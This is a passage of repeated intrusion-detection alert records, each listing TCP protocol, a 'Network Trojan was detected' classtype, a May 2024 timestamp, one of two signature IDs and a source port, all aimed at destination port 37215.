                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287752
                SID:2835222
                Source Port:52512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764192
                SID:2829579
                Source Port:46184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262525
                SID:2835222
                Source Port:49570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438713
                SID:2835222
                Source Port:33770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467095
                SID:2835222
                Source Port:55368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891146
                SID:2835222
                Source Port:55538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668207
                SID:2829579
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938852
                SID:2829579
                Source Port:53648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227833
                SID:2829579
                Source Port:57842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652446
                SID:2835222
                Source Port:56316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023567
                SID:2835222
                Source Port:56692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965702
                SID:2829579
                Source Port:41066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795221
                SID:2829579
                Source Port:38602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984585
                SID:2829579
                Source Port:55082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177438
                SID:2835222
                Source Port:58074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.966722
                SID:2829579
                Source Port:37308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023309
                SID:2835222
                Source Port:43602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701149
                SID:2835222
                Source Port:55940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292022
                SID:2829579
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898295
                SID:2829579
                Source Port:39194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111732
                SID:2829579
                Source Port:37388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080783
                SID:2835222
                Source Port:48826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511125
                SID:2835222
                Source Port:42360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791447
                SID:2835222
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446422
                SID:2829579
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222889
                SID:2829579
                Source Port:51694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668663
                SID:2835222
                Source Port:46144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773213
                SID:2829579
                Source Port:49330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869437
                SID:2835222
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886127
                SID:2835222
                Source Port:50208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363483
                SID:2829579
                Source Port:51686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109162
                SID:2835222
                Source Port:48818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911136
                SID:2829579
                Source Port:35280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.878598
                SID:2835222
                Source Port:60274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279139
                SID:2829579
                Source Port:57676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574577
                SID:2835222
                Source Port:33676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032395
                SID:2835222
                Source Port:55332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544583
                SID:2835222
                Source Port:46614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731382
                SID:2829579
                Source Port:58916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711375
                SID:2829579
                Source Port:39536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417116
                SID:2835222
                Source Port:60814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804204
                SID:2829579
                Source Port:36766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.713278
                SID:2829579
                Source Port:58136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963000
                SID:2835222
                Source Port:59036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262636
                SID:2835222
                Source Port:43466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938933
                SID:2835222
                Source Port:43978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964726
                SID:2835222
                Source Port:43244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673683
                SID:2829579
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997820
                SID:2829579
                Source Port:41104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556979
                SID:2835222
                Source Port:48540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909279
                SID:2835222
                Source Port:52766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.797981
                SID:2829579
                Source Port:39396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025706
                SID:2829579
                Source Port:55692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177362
                SID:2835222
                Source Port:41966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463503
                SID:2835222
                Source Port:59656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631779
                SID:2829579
                Source Port:48194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933322
                SID:2835222
                Source Port:34756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266580
                SID:2829579
                Source Port:39384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767504
                SID:2835222
                Source Port:32946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605306
                SID:2835222
                Source Port:37032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163451
                SID:2829579
                Source Port:50290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795511
                SID:2835222
                Source Port:42954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.726642
                SID:2829579
                Source Port:53380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969893
                SID:2835222
                Source Port:35490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101462
                SID:2835222
                Source Port:48580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938159
                SID:2835222
                Source Port:49080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131722
                SID:2835222
                Source Port:49394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911187
                SID:2835222
                Source Port:46974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436694
                SID:2829579
                Source Port:34732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931920
                SID:2835222
                Source Port:45768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555220
                SID:2835222
                Source Port:39190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893933
                SID:2835222
                Source Port:47226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.458064
                SID:2835222
                Source Port:32962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845383
                SID:2835222
                Source Port:37666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843323
                SID:2835222
                Source Port:58960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650971
                SID:2829579
                Source Port:43204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605171
                SID:2835222
                Source Port:43148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163897
                SID:2829579
                Source Port:37014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811821
                SID:2829579
                Source Port:46252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236140
                SID:2835222
                Source Port:33456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990655
                SID:2829579
                Source Port:60446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958826
                SID:2835222
                Source Port:40012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000967
                SID:2829579
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583897
                SID:2829579
                Source Port:57800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728742
                SID:2835222
                Source Port:58524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532047
                SID:2835222
                Source Port:46320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945067
                SID:2829579
                Source Port:34946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.088550
                SID:2835222
                Source Port:37592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763084
                SID:2835222
                Source Port:47156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844590
                SID:2835222
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560896
                SID:2829579
                Source Port:59400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561144
                SID:2829579
                Source Port:42052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711206
                SID:2835222
                Source Port:51582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175479
                SID:2835222
                Source Port:46068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811527
                SID:2835222
                Source Port:34200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618577
                SID:2835222
                Source Port:34834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140368
                SID:2835222
                Source Port:41846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941061
                SID:2829579
                Source Port:45864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009878
                SID:2835222
                Source Port:37602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039335
                SID:2829579
                Source Port:54026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.279339
                SID:2829579
                Source Port:44984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.095668
                SID:2835222
                Source Port:43454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713161
                SID:2829579
                Source Port:35552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284552
                SID:2829579
                Source Port:49996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624730
                SID:2829579
                Source Port:59910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686302
                SID:2829579
                Source Port:47350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506169
                SID:2835222
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842599
                SID:2829579
                Source Port:54010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645651
                SID:2835222
                Source Port:50518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988705
                SID:2829579
                Source Port:54392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717718
                SID:2829579
                Source Port:33582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171117
                SID:2829579
                Source Port:41124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795899
                SID:2829579
                Source Port:60162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809296
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944533
                SID:2829579
                Source Port:60156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178923
                SID:2829579
                Source Port:53104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266552
                SID:2835222
                Source Port:39992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989082
                SID:2835222
                Source Port:38088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897261
                SID:2829579
                Source Port:40954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631937
                SID:2835222
                Source Port:41840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207617
                SID:2835222
                Source Port:32962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764354
                SID:2835222
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807478
                SID:2835222
                Source Port:37510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100847
                SID:2835222
                Source Port:46198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.984745
                SID:2829579
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586585
                SID:2829579
                Source Port:50686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737438
                SID:2829579
                Source Port:45912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216728
                SID:2829579
                Source Port:45652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643861
                SID:2829579
                Source Port:38238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899157
                SID:2829579
                Source Port:54130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943959
                SID:2835222
                Source Port:33744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075342
                SID:2835222
                Source Port:55042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782335
                SID:2835222
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.645016
                SID:2835222
                Source Port:60302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713036
                SID:2829579
                Source Port:51392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440523
                SID:2829579
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782994
                SID:2829579
                Source Port:53762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968443
                SID:2829579
                Source Port:60564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980265
                SID:2835222
                Source Port:58058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.575499
                SID:2829579
                Source Port:40164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615218
                SID:2835222
                Source Port:50640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628416
                SID:2835222
                Source Port:57990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001072
                SID:2835222
                Source Port:48490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652074
                SID:2835222
                Source Port:57764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585099
                SID:2835222
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681730
                SID:2829579
                Source Port:47702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997847
                SID:2835222
                Source Port:48804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429316
                SID:2829579
                Source Port:59920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874876
                SID:2829579
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562245
                SID:2835222
                Source Port:53184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.169989
                SID:2829579
                Source Port:54930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562831
                SID:2829579
                Source Port:41824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810363
                SID:2835222
                Source Port:35638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896144
                SID:2835222
                Source Port:54820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276648
                SID:2829579
                Source Port:42448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446669
                SID:2829579
                Source Port:39202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332389
                SID:2829579
                Source Port:39114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.232626
                SID:2829579
                Source Port:48472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.777949
                SID:2829579
                Source Port:45968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145042
                SID:2829579
                Source Port:35866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.733435
                SID:2829579
                Source Port:48252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084349
                SID:2835222
                Source Port:52650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075428
                SID:2835222
                Source Port:56202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464012
                SID:2835222
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223479
                SID:2835222
                Source Port:37224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332271
                SID:2829579
                Source Port:40844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209803
                SID:2835222
                Source Port:50728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386232
                SID:2835222
                Source Port:47094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025515
                SID:2835222
                Source Port:49830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767566
                SID:2835222
                Source Port:54910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557752
                SID:2829579
                Source Port:53432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858276
                SID:2829579
                Source Port:37050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521046
                SID:2835222
                Source Port:47896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944767
                SID:2835222
                Source Port:37472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328370
                SID:2835222
                Source Port:38284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782983
                SID:2829579
                Source Port:47644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321334
                SID:2829579
                Source Port:59426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520490
                SID:2835222
                Source Port:46362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155038
                SID:2835222
                Source Port:57836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281409
                SID:2829579
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985468
                SID:2829579
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.570506
                SID:2829579
                Source Port:54024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610225
                SID:2829579
                Source Port:52328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654965
                SID:2829579
                Source Port:50894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326408
                SID:2835222
                Source Port:34024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778181
                SID:2835222
                Source Port:50008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.048272
                SID:2829579
                Source Port:43434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640431
                SID:2829579
                Source Port:43392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945813
                SID:2835222
                Source Port:52616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869582
                SID:2829579
                Source Port:51782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276044
                SID:2835222
                Source Port:60024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077523
                SID:2835222
                Source Port:54462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508751
                SID:2829579
                Source Port:36016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684600
                SID:2835222
                Source Port:46892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228138
                SID:2835222
                Source Port:55774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876115
                SID:2835222
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931069
                SID:2835222
                Source Port:37854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
